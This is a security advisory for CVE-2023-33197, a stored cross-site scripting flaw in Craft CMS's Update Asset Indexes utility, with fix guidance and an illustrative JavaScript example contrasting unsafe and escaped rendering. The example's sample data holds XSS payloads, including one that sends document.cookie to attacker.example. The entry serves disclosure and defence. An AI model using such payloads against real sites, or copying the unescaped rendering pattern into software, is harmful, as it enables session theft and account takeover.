PT-2023-24214 · Craft · Craft

Whitebearvn · Published 2023-05-26 · Updated 2023-06-01 · CVE-2023-33197

CVSS v3.1: 5.5 (Medium)
Vector: AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
Name of the Vulnerable Software and Affected Versions: Craft versions prior to 4.4.6

Description: Stored cross-site scripting (XSS) can be triggered through the Update Asset Indexes utility in the Craft control panel. An attacker who can upload or rename assets stores a script payload in an asset name; the payload executes in the browser of the user who later runs the utility, because the asset name is rendered into the utility's page without being escaped. Volume names are affected in the same way: they are returned in the utility's JSON response and rendered unescaped, so a payload in a volume name fires on every POST request the utility makes. Because the script runs in the control-panel session of the user running the utility, who is often an administrator, it can act or read data with that user's privileges, potentially leading to unauthorized access or data theft.

Recommendations: For versions prior to 4.4.6, update to 4.4.6 or later, which resolves the issue. Until the update can be applied, restrict access to the Update Asset Indexes utility to trusted users (via Craft's per-utility user-group permissions) and do not run the utility against volumes in which untrusted users can create or rename assets, since any payload already stored in an asset or volume name will execute when the utility runs. Updating is the only complete fix: the workaround limits who can trigger the payload but does not remove it.
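The rendering mistake described above, reduced to an added example (this is illustrative code written for this entry, not Craft's own control-panel code): a utility endpoint returns a JSON progress response carrying a volume name and the names of processed assets, and the client turns that JSON into markup. The response shape, field names and function names are assumptions; the sample response is constructed for the example. The unsafe renderer concatenates the strings straight into HTML, which is exactly how a payload stored in an asset or volume name ends up executing; the safe renderer escapes every server-supplied string first, which is equivalent to assigning `textContent` in a real DOM.

```javascript
// Added example, not Craft's code. Field names (volume.name, processed)
// and the response shape are assumptions for the demonstration.

// Constructed sample response: the volume name and one asset name carry
// the kind of payload the advisory describes.
const SAMPLE_RESPONSE = JSON.stringify({
  volume: { name: 'Uploads"><img src=x onerror=alert(document.cookie)>' },
  processed: [
    'report.pdf',
    '<script>fetch("https://attacker.example/?c="+document.cookie)</script>.jpg',
  ],
});

// Minimal HTML escaper for text placed between tags or in quoted attributes.
// '&' must be replaced first so the other entities are not double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: the JSON is trusted and its strings are concatenated
// into markup. Assigning this to element.innerHTML runs the payloads.
function renderProgressUnsafe(jsonText) {
  const data = JSON.parse(jsonText);
  let html = `<h2>Indexing ${data.volume.name}</h2><ul>`;
  for (const name of data.processed) html += `<li>${name}</li>`;
  return html + '</ul>';
}

// Hardened pattern: every string that originated outside the page is escaped
// before it becomes markup, so the same response renders as literal text.
function renderProgressSafe(jsonText) {
  const data = JSON.parse(jsonText);
  let html = `<h2>Indexing ${escapeHtml(data.volume.name)}</h2><ul>`;
  for (const name of data.processed) html += `<li>${escapeHtml(name)}</li>`;
  return html + '</ul>';
}

// Crude check for a code review or a test: if any untrusted value that
// contains markup characters appears verbatim in the output, escaping was
// skipped somewhere.
function containsRawMarkup(html, untrustedValues) {
  return untrustedValues.some((s) => /[<>"]/.test(s) && html.includes(s));
}

// Stand-alone demonstration.
const untrusted = (() => {
  const d = JSON.parse(SAMPLE_RESPONSE);
  return [d.volume.name, ...d.processed];
})();
console.log('unsafe leaks markup:', containsRawMarkup(renderProgressUnsafe(SAMPLE_RESPONSE), untrusted));
console.log('safe leaks markup:  ', containsRawMarkup(renderProgressSafe(SAMPLE_RESPONSE), untrusted));
```

The same rule applies on the server side: a Twig template that prints an asset or volume name must go through output escaping rather than `|raw`, and a JSON response that will be inserted into the page must be treated as data, never as HTML fragments.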

Exploit · Fix · XSS

Weakness Enumeration

Related Identifiers
CVE-2023-33197
GHSA-6QJX-787V-6PXR

Affected Products
Craft